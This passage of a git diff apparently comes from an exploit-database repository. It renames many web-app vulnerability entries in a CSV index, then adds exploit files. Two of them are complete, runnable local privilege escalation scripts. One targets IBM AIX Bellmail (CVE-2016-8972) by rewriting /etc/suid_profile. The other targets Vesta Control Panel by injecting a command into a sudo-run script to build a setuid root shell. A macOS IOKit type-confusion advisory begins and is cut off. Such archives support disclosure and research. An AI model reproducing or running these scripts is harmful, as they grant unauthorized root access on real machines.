 25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
-25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
+25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps,0
 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
 25248,platforms/php/webapps/25248.txt,"Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps,0
@@ -27443,7 +27453,7 @@ id,file,description,date,author,platform,type,port
 25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",php,webapps,0
 25380,platforms/php/webapps/25380.txt,"Invision Power Board 1.x - ST Parameter SQL Injection",2005-04-11,Dcrab,php,webapps,0
 25381,platforms/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,php,webapps,0
-25382,platforms/php/webapps/25382.txt,"JPortal 2.3.1 - Banner.php SQL Injection",2005-04-11,CiNU5,php,webapps,0
+25382,platforms/php/webapps/25382.txt,"jPORTAL 2.3.1 - 'Banner.php' SQL Injection",2005-04-11,CiNU5,php,webapps,0
 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - Comersus_Search_Item.asp Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0
 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0
 25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - GroupCP.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0
@@ -27616,7 +27626,7 @@ id,file,description,date,author,platform,type,port
 25619,platforms/php/webapps/25619.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0
 25620,platforms/php/webapps/25620.txt,"MidiCart PHP - Item_List.php MainGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0
 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0
-25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - OUT.php SQL Injection",2005-05-06,Kold,php,webapps,0
+25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,php,webapps,0
 25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0
 25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0
 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0
@@ -27904,7 +27914,7 @@ id,file,description,date,author,platform,type,port
 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0
 26001,platforms/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0
 26007,platforms/php/webapps/26007.txt,"PHP Ticket System Beta 1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
-26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 - download.php SQL Injection",2005-08-21,krasza,php,webapps,0
+26293,platforms/php/webapps/26293.txt,"jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection",2005-08-21,krasza,php,webapps,0
 26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 - Password.php SQL Injection",2005-08-23,retrogod@aliceposta.it,php,webapps,0
 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0
 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
@@ -28251,8 +28261,8 @@ id,file,description,date,author,platform,type,port
 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0
 26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0
 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0
-26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0
-26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0
+26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0
+26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0
 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0
 26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0
 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0
@@ -28284,7 +28294,7 @@ id,file,description,date,author,platform,type,port
 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injection",2005-11-15,abducter_minds@yahoo.com,php,webapps,0
 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0
 26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0
-26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0
+26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0
 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0
 26515,platforms/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0
 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0
@@ -28577,7 +28587,7 @@ id,file,description,date,author,platform,type,port
 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 - webcal.cgi Multiple Parameter Cross-Site Scripting",2005-12-16,"Stan Bubrouski",cgi,webapps,0
 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Full Path Disclosure",2005-12-17,king_purba,php,webapps,0
 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0
-26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum - forum.php SQL Injection",2005-12-19,Zbigniew,php,webapps,0
+26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0
 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
 26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
@@ -29523,7 +29533,7 @@ id,file,description,date,author,platform,type,port
 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - gen_confirm_mem.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php' PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0
-28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - Category.php SQL Injection",2006-07-01,black-code,php,webapps,0
+28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps,0
 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0
 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0
 28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php' _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0
@@ -29633,8 +29643,8 @@ id,file,description,date,author,platform,type,port
 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0
-28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0
-28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0
+28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - 'error.php' Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0
+28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0
 28324,platforms/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0
 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0
 28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0
@@ -29742,9 +29752,9 @@ id,file,description,date,author,platform,type,port
 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0
 28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - Viewfile Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0
 28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x - 'news.php' SQL Injection",2006-09-07,rgod,php,webapps,0
-28497,platforms/php/webapps/28497.txt,"Vikingboard Viking board 0.1b - help.php act Parameter Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
-28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b - report.php p Parameter Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
-28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - topic.php SQL Injection",2006-09-08,Hessam-x,php,webapps,0
+28497,platforms/php/webapps/28497.txt,"Vikingboard 0.1b - 'help.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
+28498,platforms/php/webapps/28498.txt,"Vikingboard 0.1b - 'report.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
+28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - 'topic.php' SQL Injection",2006-09-08,Hessam-x,php,webapps,0
 28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0
 28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0
 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0
@@ -30403,14 +30413,14 @@ id,file,description,date,author,platform,type,port
 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0
 29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - members.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0
 29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - applications/SecureLoginManager/inc_secureloginmanager.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0
-29363,platforms/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - day.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29364,platforms/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - month.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29365,platforms/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - year.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29366,platforms/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - week.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29367,platforms/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - search.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - rss/index.php getdate Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - print.php getdate Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29363,platforms/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29364,platforms/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29365,platforms/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29366,platforms/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29367,platforms/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - 'getdate' Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
@@ -30984,12 +30994,12 @@ id,file,description,date,author,platform,type,port
 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
 30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 - secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
-30383,platforms/php/webapps/30383.txt,"Vikingboard Viking board 0.1.2 - cp.php Multiple Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30384,platforms/php/webapps/30384.txt,"Vikingboard Viking board 0.1.2 - user.php u Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 - post.php Multiple Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 - topic.php s Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 - forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0
-30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 - cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0
+30383,platforms/php/webapps/30383.txt,"Vikingboard 0.1.2 - 'cp.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30384,platforms/php/webapps/30384.txt,"Vikingboard 0.1.2 - 'user.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30385,platforms/php/webapps/30385.txt,"Vikingboard 0.1.2 - 'post.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30386,platforms/php/webapps/30386.txt,"Vikingboard 0.1.2 - 'topic.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30387,platforms/php/webapps/30387.txt,"Vikingboard 0.1.2 - 'forum.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0
+30388,platforms/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0
 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0
 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0
 30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0
@@ -33555,8 +33565,8 @@ id,file,description,date,author,platform,type,port
 34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Parameter Cross-Site Scripting",2009-08-13,Isfahan,php,webapps,0
 34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop - Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0
 34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting - 'resume_register.php' Cross-Site Scripting",2009-09-06,MizoZ,php,webapps,0
-34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - search.php q Parameter Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
-34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - image.php image Parameter Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
+34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
+34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80
 34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
@@ -34556,7 +34566,7 @@ id,file,description,date,author,platform,type,port
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
-36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
+36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
 36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
 36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
diff --git a/platforms/aix/local/40950.sh b/platforms/aix/local/40950.sh
new file mode 100755
index 000000000..d35433bdb
--- /dev/null
+++ b/platforms/aix/local/40950.sh
@@ -0,0 +1,94 @@
+#!/usr/bin/sh
+#
+# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
+#
+# Affected versions:
+# AIX 6.1, 7.1, 7.2
+# VIOS 2.2.x
+#
+#         Fileset                Lower Level  Upper Level KEY
+#        ---------------------------------------------------------
+#        bos.net.tcp.client       6.1.9.0      6.1.9.200   key_w_fs
+#        bos.net.tcp.client       7.1.3.0      7.1.3.47    key_w_fs
+#        bos.net.tcp.client       7.1.4.0      7.1.4.30    key_w_fs
+#        bos.net.tcp.client_core  7.2.0.0      7.2.0.1     key_w_fs
+#        bos.net.tcp.client_core  7.2.1.0      7.2.1.0     key_w_fs
+#
+# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
+# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
+# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
+
+ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
+VULNBIN=/usr/bin/bellmail
+SUIDPROFILE=/etc/suid_profile
+
+function ESCALATE
+{
+    echo "[*] Preparing escalation"
+
+    $VULNBIN >/dev/null 2>&1 <<EOD
+s /etc/suid_profile
+EOD
+
+    if [ ! -w $SUIDPROFILE ]; then
+        echo "[-] $SUIDPROFILE is not writable. Exploit failed."
+        exit 1
+    fi
+
+    echo "[*] Clearing out $SUIDPROFILE"
+    echo > /etc/suid_profile
+
+    echo "[*] Injecting payload"
+    cat << EOF >$SUIDPROFILE
+cp /bin/ksh $ROOTSHELL
+/usr/bin/syscall setreuid 0 0
+chown root:system $ROOTSHELL
+chmod 6755 $ROOTSHELL
+rm -f $SUIDPROFILE
+EOF
+
+    echo "[*] Executing SUID to leverage privileges"
+    /usr/bin/ibstat -a >/dev/null 2>&1
+
+    if [ ! -x $ROOTSHELL ]; then
+        echo "[-] Root shell does not exist or is not executable. Exploit failed."
+        exit 1
+    fi
+
+    echo "[*] Escalating to root.."
+    $ROOTSHELL
+    echo "[*] Make sure to remove $ROOTSHELL"
+}
+
+echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
+
+$VULNBIN -e
+if [ $? -eq 0 ]
+    then
+        ESCALATE
+        echo "[*] Make sure to remove $ROOTSHELL"
+        exit 0
+fi
+
+echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
+/usr/bin/mail nonexistentuser <<EOD
+.
+.
+.
+EOD
+
+echo "[*] Waiting for mail to come in."
+
+while true
+do
+    $VULNBIN -e
+    if [ $? -eq 0 ]
+        then
+            echo "[*] Mail found"
+            ESCALATE
+            break
+        else
+            echo "[-] Mail not received yet. Sleeping."
+            sleep 10
+        fi
+done
diff --git a/platforms/linux/local/40953.sh b/platforms/linux/local/40953.sh
new file mode 100755
index 000000000..169b793f5
--- /dev/null
+++ b/platforms/linux/local/40953.sh
@@ -0,0 +1,48 @@
+#!/bin/bash
+# 
+# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
+# Google Dork: vesta control panel inurl:8083
+# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker
+# Vendor Homepage: http://vestacp.com/
+# Software Link: https://github.com/serghey-rodin/vesta
+# Version: 0.9.7 - 0.9.8-16
+#
+# Description:
+# Vesta CP default install script adds /usr/local/vesta/bin/ directory into
+# /etc/sudoers.d with the NOPASSWD option for the default "admin" user. All
+# programs in /usr/local/vesta/bin/ directory can therefore be run as root. A
+# command injection vulnerability in "v-get-web-domain-value" script can be
+# exploited to run arbitrary commands and escalate from admin user to root.
+#
+# Vulnerability:
+# Parameter $3 (key) in v-get-web-domain-value is not properly sanitized before
+# being passed to bash eval.
+#
+#
+
+# Navigate to a writeable directory, usually /tmp.
+cd /tmp
+
+# Write a simple C suid shell to suid.c.
+cat > suid.c << _EOF
+int main(void) {
+       setgid(0); setuid(0);
+       execl("/bin/sh","sh",0); }
+_EOF
+
+# Compile suid shell with gcc.
+# [!] If there is no gcc on the system deploy a precompiled binary manually.
+gcc suid.c -o suid
+
+# Create a shell script called PWN that will be run as root.
+# PWN will weaponize ./suid with executable permissions and suid bit.
+echo "chown root:root suid; chmod 777 suid; chmod +s suid;" > PWN
+
+# Make PWN shell script executable.
+chmod +x PWN
+
+# Inject command to run PWN into v-get-web-domain-value parameter $3.
+sudo /usr/local/vesta/bin/v-get-web-domain-value 'admin' 'domain.com' 'x; ./PWN;'
+
+# Spawn the root shell.
+./suid
\ No newline at end of file
diff --git a/platforms/macos/dos/40952.c b/platforms/macos/dos/40952.c
new file mode 100755
index 000000000..081f31c0d
--- /dev/null
+++ b/platforms/macos/dos/40952.c
@@ -0,0 +1,190 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=974
+
+There are two ways for IOServices to define their IOUserClient classes: they can 
+override IOService::newUserClient and allocate the correct type themselves
+or they can set the IOUserClientClass key in their registry entry.
+
+The default implementation of IOService::newUserClient does this:
+
+  IOReturn IOService::newUserClient( task_t owningTask, void * securityID,
+                                    UInt32 type,  OSDictionary * properties,
+                                    IOUserClient ** handler )
+  {
+      const OSSymbol *userClientClass = 0;
+      IOUserClient *client;
+      OSObject *temp;
+      
+      if (kIOReturnSuccess == newUserClient( owningTask, securityID, type, handler ))
+          return kIOReturnSuccess;
+      
+      // First try my own properties for a user client class name
+      temp = getProperty(gIOUserClientClassKey);
+      if (temp) {
+          if (OSDynamicCast(OSSymbol, temp))
+              userClientClass = (const OSSymbol *) temp;
+          else if (OSDynamicCast(OSString, temp)) {
+              userClientClass = OSSymbol::withString((OSString *) temp);
+              if (userClientClass)
+                  setProperty(kIOUserClientClassKey,
+                              (OSObject *) userClientClass);
+          }
+      }
+      
+      // Didn't find one so lets just bomb out now without further ado.
+      if (!userClientClass)
+          return kIOReturnUnsupported;
+      
+      // This reference is consumed by the IOServiceOpen call
+      temp = OSMetaClass::allocClassWithName(userClientClass);
+      if (!temp)
+          return kIOReturnNoMemory;
+      
+      if (OSDynamicCast(IOUserClient, temp))
+          client = (IOUserClient *) temp;
+      else {
+          temp->release();
+          return kIOReturnUnsupported;
+      }
+      
+      if ( !client->initWithTask(owningTask, securityID, type, properties) ) {
+
+  ... continue on and call client->start(this) to connect the client to the service
+
+This reads the "IOUserClientClass" entry in the services registry entry and uses the IOKit
+reflection API to allocate it.
+
+If an IOService doesn't want to have any IOUserClients then it has two options, either override
+newUserClient to return kIOReturnUnsupported or make sure that there is no IOUserClientClass
+entry in the service's registry entry.
+
+AppleBroadcomBluetoothHostController takes the second approach but inherits from IOBluetoothHostController
+which overrides ::setProperties to allow an unprivileged user to set *all* registry entry properties,
+including IOUserClientClass.
+
+This leads to a very exploitable type confusion issue as plenty of IOUserClient subclasses don't expect
